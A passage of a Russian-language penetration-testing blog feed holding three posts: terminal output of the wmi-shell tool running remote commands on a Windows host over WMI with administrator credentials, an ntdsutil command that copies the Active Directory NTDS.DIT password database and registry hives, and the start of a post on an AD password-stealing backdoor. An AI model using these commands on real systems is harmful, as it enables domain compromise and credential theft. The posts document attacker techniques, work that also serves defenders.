&lt;div id="window"&gt;&lt;div id="toolbar"&gt;&lt;div class="top"&gt;&lt;div id="lights"&gt;&lt;div class="light red"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light yellow"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light green"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="title"&gt;&lt;div class="folder"&gt;&lt;div class="tab"&gt;&lt;/div&gt;&lt;div class="body"&gt;&lt;/div&gt;&lt;/div&gt;root@bt: ~&lt;/div&gt;&lt;div id="bubble"&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="body"&gt;&lt;p&gt;root@bt:/tmp# wget&amp;nbsp;https://www.lexsi.fr/conference/wmi-shell.zip&lt;br /&gt;
root@bt:/tmp# unzip wmi-shell.zip&lt;br /&gt;
Archive: &amp;nbsp;wmi-shell.zip&lt;br /&gt;
&amp;nbsp; &amp;nbsp;creating: wmi-shell/&lt;br /&gt;
&amp;nbsp; inflating: wmi-shell/LICENSE&lt;br /&gt;
&amp;nbsp; inflating: wmi-shell/wmi-shell.py&lt;br /&gt;
&amp;nbsp; inflating: wmi-shell/README&lt;br /&gt;
&amp;nbsp; inflating: wmi-shell/base.vbs&lt;br /&gt;
&amp;nbsp; &amp;nbsp;creating: wmi-shell/bin/&lt;br /&gt;
&amp;nbsp; inflating: wmi-shell/bin/base64.c&lt;br /&gt;
&amp;nbsp; inflating: wmi-shell/bin/base64.exe&lt;br /&gt;
&amp;nbsp; inflating: wmi-shell/bin/wmis&lt;br /&gt;
&amp;nbsp; inflating: wmi-shell/bin/wmic&lt;br /&gt;
&amp;nbsp; &amp;nbsp;creating: wmi-shell/b64-source/&lt;br /&gt;
&amp;nbsp; inflating: wmi-shell/b64-source/base64.exe&lt;br /&gt;
&amp;nbsp; inflating: wmi-shell/b64-source/base64.c&lt;br /&gt;
root@bt:/tmp# cd wmi-shell/&lt;br /&gt;
root@bt:/tmp/wmi-shell# python wmi-shell.py administrator password 10.1.37.134&lt;br /&gt;
Sending our VBS script to &amp;nbsp;10.1.37.134 &amp;nbsp;ETA: ~6.4 seconds.&lt;br /&gt;
Executed command --&amp;gt; &amp;nbsp; ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo Function base64_encode( byVal strIn ) &amp;gt;&amp;gt;%TEMP%\E2BpK7z.vbs" 2&amp;gt;/dev/null &amp;nbsp;&amp;lt;-- . Returned code: &amp;nbsp;1&lt;br /&gt;
...&lt;br /&gt;
Executed command --&amp;gt; &amp;nbsp; ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo End Select &amp;gt;&amp;gt;%TEMP%\E2BpK7z.vbs" 2&amp;gt;/dev/null &amp;nbsp;&amp;lt;-- . Returned code: &amp;nbsp;1&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; dir C:\\&lt;br /&gt;
Executed command --&amp;gt; &amp;nbsp; ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%\E2BpK7z.vbs \"dir C:\\\"" 2&amp;gt;/dev/null &amp;nbsp;&amp;lt;-- . Returned code: &amp;nbsp;1&lt;br /&gt;
Executed command --&amp;gt; &amp;nbsp; ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" &amp;gt; bSKFiy5_ready.tmp &amp;nbsp;&amp;lt;-- . Returned code: &amp;nbsp;0&lt;br /&gt;
waiting for command output . . Executed command --&amp;gt; &amp;nbsp; ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" &amp;gt; bSKFiy5_ready.tmp &amp;nbsp;&amp;lt;-- . Returned code: &amp;nbsp;0&lt;br /&gt;
. &amp;nbsp;done !&lt;br /&gt;
Executed command --&amp;gt; &amp;nbsp; ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'EVILTAG%'" &amp;gt; bSKFiy5.tmp &amp;nbsp;&amp;lt;-- . Returned code: &amp;nbsp;0&lt;br /&gt;
Volume in drive C has no label.&lt;br /&gt;
&amp;nbsp;Volume Serial Number is 8E25-9E63&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Directory of C:\&lt;br /&gt;
&lt;br /&gt;
14.07.2009 &amp;nbsp;07:20 &amp;nbsp; &amp;nbsp;&amp;lt;DIR&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;PerfLogs&lt;br /&gt;
19.04.2014 &amp;nbsp;03:12 &amp;nbsp; &amp;nbsp;&amp;lt;DIR&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Program Files&lt;br /&gt;
19.04.2014 &amp;nbsp;22:04 &amp;nbsp; &amp;nbsp;&amp;lt;DIR&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Program Files (x86)&lt;br /&gt;
19.04.2014 &amp;nbsp;03:05 &amp;nbsp; &amp;nbsp;&amp;lt;DIR&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Users&lt;br /&gt;
20.04.2014 &amp;nbsp;04:19 &amp;nbsp; &amp;nbsp;&amp;lt;DIR &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Windows&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;0 File(s) &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;0 bytes&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;5 Dir(s) &amp;nbsp;82▒326▒290▒432 bytes free&lt;br /&gt;
Executed command --&amp;gt; &amp;nbsp; ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%\E2BpK7z.vbs \"cleanup\"" 2&amp;gt;/dev/null &amp;nbsp;&amp;lt;-- . Returned code: &amp;nbsp;1&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt;&lt;/p&gt;&lt;div class="cursor"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>[hacking tricks] Easy way to get a ntds.dit</title><link>http://devteev.blogspot.com/2014/04/hacking-tricks-easy-way-to-get-ntdsdit.html</link><category>Active Directory</category><category>hack</category><category>Microsoft</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Sat, 12 Apr 2014 14:40:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-1131767134434674769</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Все секреты Active Directory как известно хранятся в одном единственном файлике NTDS.DIT, который представляет из себя специально разработанную компанией Microsoft базу данных. Для получения копии этой базы &lt;i&gt;варварским&lt;/i&gt; способом может использоваться механизм &amp;nbsp;&lt;a href="http://devteev.blogspot.ru/2013/09/windows-shadow-hack.html" target="_blank"&gt;теневых копий&lt;/a&gt;. Почему варварским? Да потому, что в момент создания теневой копии в базе могут выполняться различные транзакции, что несколько повлияет на целостность полученной копии. Но начиная с Windows 2008 корпорация добра расширила возможности утилиты&amp;nbsp;&lt;a href="http://technet.microsoft.com/en-us/library/cc753343.aspx" target="_blank"&gt;Ntdsutil&lt;/a&gt;, что позволяет стащить базу NTDS.DIT с работающей системы не повредив ее при этом. Раньше применение утилиты&amp;nbsp;Ntdsutil ограничивалось режимом восстановления контроллера домена.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Спасибо за находку&amp;nbsp;&lt;a href="https://twitter.com/obscuresec/status/437075468467306496" target="_blank"&gt;@obscuresec&lt;/a&gt;!!&lt;/div&gt;&lt;style&gt;
/* http://cssdeck.com/labs/pure-css-osx-terminal */
body { background:#d2dfe6;
color: #444;
font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
line-height: 1.5em;
}

/* FINDER WINDOW */

#window{
    width: 90%;
    margin-top:40px;
 margin-left: auto;
 margin-right: auto;
    margin-bottom:40px;
    min-width: 500px; 
    background: #fff;
    border-radius: 5px;
    -webkit-box-shadow: 0px 0px 20px rgba(0,0,0,0.75);
    -moz-box-shadow: 0px 0px 20px rgba(0,0,0,0.75);
    /*-webkit-transition:all 0.5s; */
    overflow: hidden; 
}

/* TOP BAR */
#topbar{
    width: 100%;
    height: 21px;
    font-size: 16px;
    font-family: "Myriad Pro", sans-serif;
    text-shadow:0px 1px 0px rgba(255,255,255,0.25);
    -webkit-box-shadow:0 1px 0 rgba(0,0,0,0.5); 
    -moz-box-shadow:0 1px 0 rgba(0,0,0,0.5); 
   
    
}
#topbar ul li {
    float: left; 
    padding:0 10px;
    height: 21px;
    line-height: 24px;
}
#topbar ul li:first-child{
    font-size: 20px;
    line-height: 26px;
    margin-left: 5px;
}
#topbar ul li:nth-child(2){
    font-family: "Myriad-Semi", sans-serif;
}
#topbar ul li:active{
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #4a82ff),color-stop(0, #0052fc));
    color: #fff;
    text-shadow: none;
}
#toolbar{
    width: 100%; 
    height: 25px;
    background: grey;
    border-radius:5px 5px 0 0;

    background: #cfcfcf; /* Old browsers */
    background: -moz-linear-gradient(top,  #cfcfcf 0%, #a8a8a8 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#cfcfcf), color-stop(100%,#a8a8a8)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* IE10+ */
    background: linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* W3C */
    
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
    box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;        
    
}
#toolbar .top{
    float: left; 
    width: 100%; 
    height: 23px;
}
#toolbar .bottom{
    float: left; 
    width: 100%; 
    height: 30px;
}

/*-----TRAFFIC LIGHTS-----*/
#toolbar #lights{
    float: left;
    position:relative;
    top:4px;
    left:7px; 
}
.light{
    float:left;
    width:14px;
    height:14px;
    border-radius:14px;
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    overflow: hidden;
}
#lights:hover .glyph{
    opacity: 1;
    cursor:default;
    
}
.light .shine{
     width: 4px;
     height:3px;
     border-radius:10px;
     /*background-image: -webkit-gradient(radial, center center, 0, center center, 3, from(rgba(255,255,255,1)), to(rgba(255,255,255,0)));*/
     background: -moz-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%, rgba(255,255,255,0) 100%); /* FF3.6+ */    
     background-image: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%,rgba(255,255,255,1)), color-stop(100%,rgba(255,255,255,0))); /* Chrome,Safari4+ */
     background: -webkit-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* Chrome10+,Safari5.1+ */
     background: -o-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* Opera 12+ */
     background: -ms-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* IE10+ */
     background: radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* W3C */
     
}
.light .glow{
    width:14px;
    height:8px; 
    background-image: -webkit-gradient(radial, center bottom, 0, center center, 5, from(rgba(255,255,255,0.75)), to(rgba(255,255,255,0)));
    background: 0px 0px -moz-radial-gradient(bottom, cover,  rgba(255,255,255,0.70) 0%, rgba(255,255,255,0) 80%); /* FF3.6+ */
   
}
/*--RED--*/
.red{
   background: #f41b16; /* Old browsers */
   background: -moz-linear-gradient(top,  #f41b16 0%, #fc7471 100%); /* FF3.6+ */
   background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#f41b16), color-stop(100%,#fc7471)); /* Chrome,Safari4+ */
   background: -webkit-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* Chrome10+,Safari5.1+ */
   background: -o-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* Opera 11.10+ */
   background: -ms-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* IE10+ */
   background: linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* W3C */   
}
.red:active{
     
    background: #972f2e; /* Old browsers */
    background: -moz-linear-gradient(top,  #972f2e 0%, #fc7471 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#972f2e), color-stop(100%,#fc7471)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* IE10+ */
    background: linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* W3C */    
}
.red .shine{    
    position: relative;
    top: -23px;
    left: 5px;  
}
.red .glow{
    position: relative;
    top: -22px;
}
.red .glyph{
    position: relative;
    top: -6px;
    left: 3px;
    font-size: 14px;
    font-weight: bold;
    color: #9b3a36;
    z-index: 50;
    opacity: 0;
}
/*--YELLOW--*/
.yellow{
    background: #f4a316; /* Old browsers */
    background: -moz-linear-gradient(left,  #f4a316 0%, #fcc371 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, right top, color-stop(0%,#f4a316), color-stop(100%,#fcc371)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* IE10+ */
    background: linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* W3C */  
    margin:0px 7px;
}
.yellow:active{
    background: #ae4f1e; /* Old browsers */
    background: -moz-linear-gradient(top,  #ae4f1e 0%, #fcc371 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ae4f1e), color-stop(100%,#fcc371)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* IE10+ */
    background: linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* W3C */    
}
.yellow .shine{ 
    position: relative;
    top: -23px;
    left: 5px;  
}
.yellow .glow{
    position: relative;
    top: -22px;
}


.yellow .glyph{
    position: relative;
    top: -7px;
    left: 4px;
    font-size: 24px;
    color: #854322;
    z-index: 50;
    opacity: 0;
    -webkit-transform: scaleY(1.5) scaleX(1.3);
}

/*--GREEN--*/
.green{
    
    background: #4cae2e; /* Old browsers */
    background: -moz-linear-gradient(top,  #4cae2e 0%, #dafc71 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#4cae2e), color-stop(100%,#dafc71)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* IE10+ */
    background: linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* W3C */
    
}
.green:active{
  background: #48752b; /* Old browsers */
  background: -moz-linear-gradient(top,  #48752b 0%, #dafc71 100%); /* FF3.6+ */
  background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#48752b), color-stop(100%,#dafc71)); /* Chrome,Safari4+ */
  background: -webkit-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* Chrome10+,Safari5.1+ */
  background: -o-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* Opera 11.10+ */
  background: -ms-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* IE10+ */
  background: linear-gradient(top,  #48752b 0%,#dafc71 100%); /* W3C */
  
}
.green .shine{  
    position: relative;
    top: -22px;
    left: 5px; 
}
.green .glow{
    position: relative;
    top: -22px;
}
.green .glyph{
    position: relative;
    top: -6px;
    left: 3px;
    font-size: 14px;
    font-weight: bold;
    color: #25571d;
    z-index: 50;
    opacity: 0;
}

/* Horrible to do this for firefox */
@-moz-document url-prefix() {
  
  .red .glyph {
      position: relative;
      top: -4px;
  }  
  .yellow .glyph {
      top: -4px;
      left: 3px;
  }
    
  .green .glyph{
      position: relative;
      top: -4px;
  }
  
}

/*-----TITLE-----*/
#title{
    float: left; 
    position: relative;
    top:4px;
    width:40%;
    left: 30%;
    font-family: "Myriad Pro", sans-serif; 
    font-size: 14px; 
    text-shadow: 0px 1px 0px rgba(255,255,255,0.5);
    line-height: 14px; 
}
.folder{
    float: left;
    margin-right:5px;
}
.folder .tab{
    width:4px;
    height:2px;
    background:#a4c5da;
    border:1px solid #728ea3;
    border-bottom: none;
    border-radius:2px 2px 0px 0px;
    -webkit-box-shadow:0px -1px 0px #99b5c7 inset;
    margin-left: 1px;
    z-index: 5000;
    margin-bottom: -1px; 
}
.folder .body{
    width: 14px;
    height: 10px;
    border:1px solid #6e8ba1;
    
    background: #b8cfe0; /* Old browsers */
    background: -moz-linear-gradient(top,  #b8cfe0 0%, #86adc8 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#b8cfe0), color-stop(100%,#86adc8)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* IE10+ */
    background: linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* W3C */    
    
    z-index: -50;
    
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.25) inset,0px 1px 0px rgba(0,0,0,0.2);
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.25) inset,0px 1px 0px rgba(0,0,0,0.2);
}


#nav{
    margin: 1px 8px;
    float: left;
}
#view{
    margin: 2px 0 0 110px;
    display: inline-block;
}

.control_box{
    height:20px;
    border-radius: 3px;
    border: 1px solid #555;
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #fefefe),color-stop(0, #b8b8b8));
    box-shadow:0px 1px 0px rgba(255,255,255,0.25);
}
.control_box .control{
    height:20px;
    border-right: 1px solid #2e2e2e;
    float: left;
    text-align: center; 
    width: 27px; 
}
.control:last-child{
    border-right: 0px solid !important;
}
.control:active{ 
    background: #b0afb0; 
    -webkit-box-shadow:0px 0px 4px #000 inset;
}
.active{
    background: #707070 !important;
    -webkit-box-shadow:0px 3px 4px rgba(0,0,0,0.6) inset !important;
}


#body {
    font-family: Andale Mono, monospace;  line-height: 1em;
    font-size:13px;
    float: left;
    width: 100%;
    min-height:130px;
    background:#000;
    padding:10px;
    line-height:1.5em;
}
#body p { 
   color: #63de00!important; 
}

@keyframes blink
{
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}

@-webkit-keyframes blink {
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}
@-moz-keyframes blink {
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}
.cursor {
  background:#63de00; 
  display:inline-block;
  width:11px;
  height:19px;
  margin-bottom:-3px;
}
#body:hover .cursor {
    -webkit-animation-name: blink;
    -webkit-animation-duration: 1.5s;
    -webkit-animation-iteration-count: infinite;
    -moz-animation-name: blink;
    -moz-animation-duration: 1.5s;
    -moz-animation-iteration-count: infinite;
}
  
#body p::-webkit-selection  {
    background:#0b209e;
}
#body p::selection { background:#0b209e; }
#body p::-moz-selection { background:#0b209e; }

#body p {
  margin-top:5px;
  margin-bottom:5px;
  font-size:13px;
}

#content{
    float: left; 
    margin-top: 1px;
}
#foot{
    height: 23px;
    width: 100%;
    float: left;
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #cbcbcb),color-stop(0, #a7a7a7));
    border-top:1px solid #515151;
    border-radius:0 0 5px 5px;
}
#foot .handle{
    width: 11px;
    height: 11px;
    float: right;
    margin: 6px;
    overflow: hidden;
}
.handle .grip{
    -webkit-transform: rotate(45deg) scaley(3);
    margin: 2px 0 0 2px;
    color: #646464;
    text-shadow: 1px 1px 0 #c6c6c6;
    font-size: 14px;
}

.icon{
    width: 86px; 
    height: 100px;
    margin: 20px; 
    float: left;
    font-family: "Myriad Pro", sans-serif; 
    text-align: center; 
    font-size: 12px;
}
.icon .frame{
    width: 82px;
    height: 82px; 
    border-radius: 5px;
    border: 2px solid transparent; 
}
.icon .name{
    color: #000;
    padding-top: 3px; 
    border-radius:15px;
    width: 55px;
    margin: 5px 0 0 15px;
}
.icon .folder{
    margin:15px 0 0 6px;
}
&lt;/style&gt;&lt;br /&gt;
&lt;div id="window"&gt;&lt;div id="toolbar"&gt;&lt;div class="top"&gt;&lt;div id="lights"&gt;&lt;div class="light red"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light yellow"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light green"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="title"&gt;&lt;div class="folder"&gt;&lt;div class="tab"&gt;&lt;/div&gt;&lt;div class="body"&gt;&lt;/div&gt;&lt;/div&gt;C:\Windows\System32&amp;gt;&lt;/div&gt;&lt;div id="bubble"&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="body"&gt;&lt;p&gt;Microsoft Windows [Версия 6.0.6001]&lt;br /&gt;
(C) Корпорация Майкрософт, 2006. Все права защищены.&lt;br /&gt;
&lt;br /&gt;
C:\Windows\system32&gt;ntdsutil "ac in ntds" "ifm" "cr fu c:\Windows\Temp\abc" q q&lt;br /&gt;
&lt;br /&gt;
ntdsutil: ac in ntds&lt;br /&gt;
Активный экземпляр - "ntds".&lt;br /&gt;
ntdsutil: ifm&lt;br /&gt;
IFM: cr fu c:\Windows\Temp\abc&lt;br /&gt;
Создание снимка...&lt;br /&gt;
Успешно создан набор снимков {8d6cf811-ccd4-4dbe-9190-b911bb96196a}.&lt;br /&gt;
Снимок {f31648c2-0afd-4c5d-bd05-54e42debe6f1} установлен как C:\$SNAP_2014041214&lt;br /&gt;
02_VOLUMEC$\&lt;br /&gt;
Снимок  {f31648c2-0afd-4c5d-bd05-54e42debe6f1} уже подключен.&lt;br /&gt;
Запуск режима ДЕФРАГМЕНТАЦИИ...&lt;br /&gt;
     Исходная база данных: C:\$SNAP_201404121402_VOLUMEC$\Windows\NTDS\ntds.dit&lt;br /&gt;
     Конечная база данных: c:\Windows\Temp\abc\Active Directory\ntds.dit&lt;br /&gt;
&lt;br /&gt;
                  Defragmentation  Status (% complete)&lt;br /&gt;
&lt;br /&gt;
          0    10   20   30   40   50   60   70   80   90  100&lt;br /&gt;
          |----|----|----|----|----|----|----|----|----|----|&lt;br /&gt;
          ...................................................&lt;br /&gt;
&lt;br /&gt;
Копирование файлов реестра...&lt;br /&gt;
Копирование c:\Windows\Temp\abc\registry\SYSTEM&lt;br /&gt;
Копирование c:\Windows\Temp\abc\registry\SECURITY&lt;br /&gt;
Снимок {f31648c2-0afd-4c5d-bd05-54e42debe6f1} отключен.&lt;br /&gt;
Носитель IFM успешно создан в c:\Windows\Temp\abc&lt;br /&gt;
IFM: q&lt;br /&gt;
ntdsutil: q&lt;br /&gt;
&lt;br /&gt;
C:\Windows\system32&gt;&lt;/p&gt;&lt;div class="cursor"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Binary backdoor in Active Directory :: Stealing passwords</title><link>http://devteev.blogspot.com/2014/04/binary-backdoor-in-active-directory.html</link><category>backdoor</category><category>Microsoft</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Thu, 10 Apr 2014 03:22:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-4603059505799029650</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;До сегодняшнего дня я писал только про бэкдоры в AD на уровне приложения [&lt;a href="http://devteev.blogspot.ru/2014/03/yep-another-backdoor-in-active.html" target="_blank"&gt;1&lt;/a&gt;, &lt;a href="http://devteev.blogspot.ru/2012/03/backdoor-active-directory-iii.html" target="_blank"&gt;2&lt;/a&gt;, &lt;a href="http://devteev.blogspot.ru/2012/01/backdoor-active-directory.html" target="_blank"&gt;3&lt;/a&gt;, &lt;a href="http://devteev.blogspot.ru/2011/02/backdoor-active-directory.html" target="_blank"&gt;4&lt;/a&gt;, &lt;a href="http://devteev.blogspot.ru/2009/04/blog-post_17.html?showComment=1260267626293#c3485689993298251643" target="_blank"&gt;5&lt;/a&gt;]. Подобные закладки интересны в первую очередь тем, что они имеют высокую степень живучести за счет того, что присутствуют в реплике Active Directory. Такие закладки могут пережить даже смутные времена disaster recovery, после признания админами факта компрометации AD. Но обладая привилегиями системы на контроллерах домена, появляются иные способы сохранить свое незримое присутствие не доводя админов до белого колена. Одному из таких способов и посвящена данная публикация.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;В далекие времена смены шкурок формы ввода логинов и паролей (&lt;a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa380543%28v=vs.85%29.aspx" target="_blank"&gt;аля gina.dll&lt;/a&gt;) нашлись умельцы, которые приспособили эту возможность винды для аккуратного складирования используемых креденшелов в текстовый файлик (&lt;a href="http://samsclass.info/126/proj/p14-lab11-1" target="_blank"&gt;ссылка&lt;/a&gt;). Серьезным ограничением данного подхода являлось то, что атакующему требовалось заменить джину на всех компутерах, на которых хотелось пособирать заветные пароли.&amp;nbsp;Соответственно сам перехват осуществляется в момент ввода логина и пароля.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy5CqiDa4fcH5WijcZISwYpFu_7zsL9CezbsDVZiUeRbWygdQIOd7WMcvrsye8oMOtaIf7hmB0hXv7K-1MPhrFr9XYLhc-aUBlKTrZuJ5k4IEOK-Y5riL9tQRxEpyyOo8tehrTeY2VyOo/s1600/image47%5B1%5D.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy5CqiDa4fcH5WijcZISwYpFu_7zsL9CezbsDVZiUeRbWygdQIOd7WMcvrsye8oMOtaIf7hmB0hXv7K-1MPhrFr9XYLhc-aUBlKTrZuJ5k4IEOK-Y5riL9tQRxEpyyOo8tehrTeY2VyOo/s1600/image47%5B1%5D.png" width="500" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
